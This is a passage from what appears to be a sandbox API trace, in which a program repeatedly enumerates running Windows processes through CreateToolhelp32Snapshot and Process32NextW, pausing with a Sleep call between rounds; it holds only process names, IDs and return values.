th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0151.135] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0151.137] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0151.138] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0151.139] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0151.141] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0151.196] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0151.197] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0151.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0151.200] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0151.201] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0151.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0151.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0151.205] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.207] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0151.208] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0151.209] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0151.211] CloseHandle (hObject=0xbc) returned 1 [0151.211] Sleep (dwMilliseconds=0x12c) [0151.532] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0151.538] 
Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.539] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0151.540] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0151.541] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.541] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0151.542] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.543] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0151.544] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0151.545] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0151.545] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0151.546] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.547] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.548] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.549] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.550] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.551] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0151.552] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.552] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.553] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0151.555] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.556] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0151.558] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0151.559] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0151.560] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0151.562] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.563] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0151.565] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0151.567] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0151.568] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0151.573] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0151.575] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0151.576] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0151.578] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0151.640] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0151.642] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) 
returned 1 [0151.643] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0151.644] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0151.646] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0151.647] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0151.649] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0151.650] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0151.651] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="pickup.exe")) returned 1 [0151.653] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0151.654] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0151.655] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0151.657] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0151.658] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.660] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0151.661] CloseHandle (hObject=0xc4) returned 1 [0151.661] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0151.667] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.668] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0151.669] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0151.670] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.671] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0151.756] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.757] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0151.758] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0151.758] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0151.759] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0151.760] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.761] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.762] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.763] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.763] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.764] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0151.765] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.766] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 